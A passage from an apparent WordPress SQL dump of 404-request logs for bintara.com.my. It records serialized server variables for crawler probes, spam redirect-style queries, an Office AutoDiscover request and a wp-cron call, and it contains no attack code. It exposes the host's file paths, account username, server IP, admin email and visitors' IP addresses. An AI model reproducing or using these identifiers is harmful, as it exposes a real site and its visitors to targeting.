Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"124.201.5.253\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"124.201.5.253\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/big5/lib/indexx.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/big5/lib/indexx.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Vb66CYj3S7An3VFFsfgAAAUs\";s:12:\"REDIRECT_URL\";s:20:\"/big5/lib/indexx.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61019\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/big5/lib/indexx.asp\";s:10:\"SCRIPT_URL\";s:20:\"/big5/lib/indexx.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Vb66CYj3S7An3VFFsfgAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804527.6768\";s:12:\"REQUEST_TIME\";s:10:\"1571804527\";}}','notice','2019-10-23 04:22:10','2019-10-23 04:22:08',35343064,37147120,'http://bintara.com.my//big5/lib/indexx.asp',1,0,'124.201.5.253'),(28841,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:124:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvirginiaelectronicsdeals.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:122:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvirginiaelectronicsdeals.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.87.184\";s:11:\"REMOTE_PORT\";s:5:\"64353\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-hEOHARMCuuKQiJT8B@wAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571807505.0549\";s:12:\"REQUEST_TIME\";s:10:\"1571807505\";}}','notice','2019-10-23 05:11:48','2019-10-23 05:11:45',35317768,37126048,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvirginiaelectronicsdeals.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'199.34.87.184'),(28842,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.87.184\";s:11:\"REMOTE_PORT\";s:5:\"19694\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-hG1mW5vMCSrSDDljB8QAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571807516.1912\";s:12:\"REQUEST_TIME\";s:10:\"1571807516\";}}','notice','2019-10-23 05:12:00','2019-10-23 05:11:57',34926872,36728376,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'199.34.87.184'),(28843,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.182.24.98\";s:11:\"REMOTE_PORT\";s:5:\"24664\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-vsHIIkjpJzJ2025K2cgAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571811248.362\";s:12:\"REQUEST_TIME\";s:10:\"1571811248\";}}','notice','2019-10-23 06:14:10','2019-10-23 06:14:08',34921496,36733960,'https://bintara.com.my/?page_id=18',1,0,'207.182.24.98'),(28844,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3F48930E-6551-4BBA-80C1-DEDECCDEDD83\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-y03lonjnFhdaVmZhJgAAAARA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.139.175.208\";s:11:\"REMOTE_PORT\";s:5:\"62542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-y03lonjnFhdaVmZhJgAAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571812051.1644\";s:12:\"REQUEST_TIME\";s:10:\"1571812051\";}}','notice','2019-10-23 06:27:33','2019-10-23 06:27:31',35277504,37073432,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.175.208'),(28845,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:113:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftopbesttablet.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:111:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftopbesttablet.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.180.4.197\";s:11:\"REMOTE_PORT\";s:5:\"62514\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-2jVmW5vMCSrSDDljMbQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571813005.1156\";s:12:\"REQUEST_TIME\";s:10:\"1571813005\";}}','notice','2019-10-23 06:43:26','2019-10-23 06:43:25',34923840,36731008,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftopbesttablet.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'139.180.4.197'),(28846,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.180.4.197\";s:11:\"REMOTE_PORT\";s:5:\"40819\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-2lFmW5vMCSrSDDljMcgAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571813012.6587\";s:12:\"REQUEST_TIME\";s:10:\"1571813012\";}}','notice','2019-10-23 06:43:35','2019-10-23 06:43:33',34921896,36732328,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'139.180.4.197'),(28847,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.232.112.162\";s:11:\"REMOTE_PORT\";s:5:\"36346\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-8gJRr7NRBVHKuKoMOTQAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571814528.8627\";s:12:\"REQUEST_TIME\";s:10:\"1571814528\";}}','notice','2019-10-23 07:08:52','2019-10-23 07:08:49',34926736,36729736,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'188.232.112.162'),(28285,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571396743.5239310264587402343750\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571396743.5239310264587402343750\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571396743.5239310264587402343750\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; 